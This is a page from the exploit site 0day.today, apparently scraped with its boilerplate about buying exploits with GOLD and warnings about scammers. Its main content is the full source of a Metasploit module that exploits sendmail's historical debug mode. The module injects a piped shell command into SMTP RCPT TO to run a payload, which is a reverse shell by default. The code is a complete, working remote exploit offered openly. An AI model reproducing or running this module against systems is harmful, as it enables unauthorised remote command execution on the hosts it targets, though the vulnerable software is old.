0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Morris Worm sendmail Debug Mode Shell Escape Exploit
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'expect' class MetasploitModule < Msf::Exploit::Remote # cmd/unix/reverse spams the session with Telnet codes on EOF Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Morris Worm sendmail Debug Mode Shell Escape', 'Description' => %q{ This module exploits sendmail's well-known historical debug mode to escape to a shell and execute commands in the SMTP RCPT TO command. This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg. Currently only cmd/unix/reverse and cmd/unix/generic are supported. }, 'Author' => [ 'Robert Tappan Morris', # Exploit and worm for sure 'Cliff Stoll', # The Cuckoo's Egg inspiration 'wvu' # Module and additional research ], 'References' => [ ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'], # Analysis ['URL', 'https://github.com/arialdomartini/morris-worm'], # Source ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup ], 'DisclosureDate' => 'Nov 2 1988', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => false, # DefUid in src/conf.c, usually "daemon" 'Payload' => {'Compat' => {'RequiredCmd' => 'generic telnet'}}, 'Targets' => [ # https://en.wikipedia.org/wiki/Source_Code_Control_System ['@(#)version.c 5.51 (Berkeley) 5/2/86', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'} )) register_options([Opt::RPORT(25)]) register_advanced_options([ OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5]) ]) end def check checkcode = CheckCode::Safe connect res = sock.get_once return CheckCode::Unknown unless res if res =~ /^220.*Sendmail/ checkcode = CheckCode::Detected end sock.put("DEBUG\r\n") res = sock.get_once return checkcode unless res if res.start_with?('200 Debug set') checkcode = CheckCode::Appears end checkcode rescue Rex::ConnectionError => e vprint_error(e.message) CheckCode::Unknown ensure disconnect end def exploit # We don't care who the user is, so randomize it from = rand_text_alphanumeric(8..42) # Strip mail header with sed(1), pass to sh(1), and ensure a clean exit to = %("| sed '1,/^$/d' | sh; exit 0") # We don't have $PATH, so set one path = '/bin:/usr/bin:/usr/ucb:/etc' sploit = { nil => /220.*Sendmail/, 'DEBUG' => /200 Debug set/, "MAIL FROM:<#{from}>" => /250.*Sender ok/, "RCPT TO:<#{to}>" => /250.*Recipient ok/, 'DATA' => /354 Enter mail/, # Indent PATH= so it's not interpreted as part of the mail header " PATH=#{path}" => nil, 'export PATH' => nil, payload.encoded => nil, '.' => /250 Ok/, 'QUIT' => /221.*closing connection/ } print_status('Connecting to sendmail') connect print_status('Enabling debug mode and sending exploit') sploit.each do |line, pattern| Timeout.timeout(datastore['SendExpectTimeout']) do if line print_status("Sending: #{line}") sock.put("#{line}\r\n") end if pattern vprint_status("Expecting: #{pattern.inspect}") sock.expect(pattern) do |pat| return unless pat vprint_good("Received: #{pat.first}") end end end end rescue Rex::ConnectionError => e fail_with(Failure::Unreachable, e.message) rescue Timeout::Error fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') ensure disconnect end def on_new_session(session) print_warning("Do NOT type `exit', or else you may lose further shells!") print_warning('Hit ^C to abort the session instead, please and thank you') end end # 0day.today [2024-09-29] #